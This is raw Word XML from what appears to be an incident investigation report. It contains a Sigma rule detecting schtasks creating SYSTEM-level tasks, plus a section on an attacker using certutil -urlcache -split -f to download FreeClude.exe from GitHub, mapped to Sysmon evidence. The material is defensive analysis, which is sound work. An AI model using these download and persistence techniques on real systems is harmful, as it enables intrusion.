                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logsource:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B048500">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category: process_creation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BCD68F">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product: windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D37436B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>detection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4BED06">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selection_image:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED7F916">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Image|endswith: '\schtasks.exe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27145F5B">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selection_create:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42213FAE">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CommandLine|contains: ' /create '</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C8B6C0">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selection_system:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43084C58">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CommandLine|contains:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AC0986">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 ' /ru system '</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5DFEFD">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 ' /ru "system" '</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B4C58D">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condition: all of selection_*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35951A15">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41ED34AD">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>level: high</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB1D237">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tags:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B88DC9B">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 attack.persistence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EEF579A">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 attack.execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F6959D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  - attack.t1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D202BCF">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB55BE0">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E4EA8FC">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133B3CC6">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40619357">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787A7857">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71546262">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523EEAB8">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2841783D">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A5B453">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2845BC7E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C658ADB">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF1A8E2">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4494AED8">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B409F5">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D41597">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6D9540">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA1EB1E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6896E9EE">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFAC1D6">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0CCC6E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C648278">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E71E941">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4273B1DA">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B161C12">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">11 / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>TOOL TRANSFER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C02EF">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6 — Ingress Tool Transfer via certutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E3C34">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The sixth phase shows the attacker acquiring a second-stage tool through the native Windows certutil.exe utility. The observed execution used certutil -urlcache -split -f to retrieve a file from GitHub and save it locally as FreeClude.exe. The command executed from the compromised Windows 10 endpoint under the SH-WIN10\saad user context with High integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215817F3">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This activity supports T1105 — Ingress Tool Transfer, as a remote payload was transferred from an external location to the compromised host. The command line provides the strongest evidence because it contains both the remote URL and the local output path. The transfer should be correlated with subsequent file creation and process execution to establish the complete acquisition → staging → execution sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D153C6">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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8"/>
        <w:gridCol w:w="3315"/>
        <w:gridCol w:w="4065"/>
      </w:tblGrid>
      <w:tr w14:paraId="1DBC3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2718" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0032B7FC">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p>
          <w:p w14:paraId="57781AA7">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Action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="122B6D2D">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3315" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CFD7359">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ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4065" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="675D4CF5">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Sysmon Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2BC56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2718" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="660B314F">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Download file using certutil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3315" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC9BCD2">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T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4065" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="349566B2">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Sysmon Event ID 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>certutil.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>-urlcache -split -f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1E890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2718" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="294C9E44">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Specify remote source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3315" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FA82011">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T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4065" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CD09BA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Sysmon Event ID 1 showing the GitHub URL in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>CommandLine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2BDA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2718" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B8945B8">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Save downloaded payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3315" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DFFE475">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T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4065" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78877DC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Sysmon Event ID 1 showing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3194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2718" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B3E4821">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Network connection for transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3315" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52A0FF8E">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T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4065" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="213525B8">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Sysmon Event ID 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> for the network connection associated with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>certutil.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1418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2718" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29C0143C">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Create downloaded file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3315" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23E0D72E">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>T1105 — Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4065" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67017A17">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Sysmon Event ID 11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> showing creation of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>FreeClude.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64B745B5">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F60AED">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Splunk: scheduled task investigation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="123" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10025"/>
      </w:tblGrid>
      <w:tr w14:paraId="4502B113">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
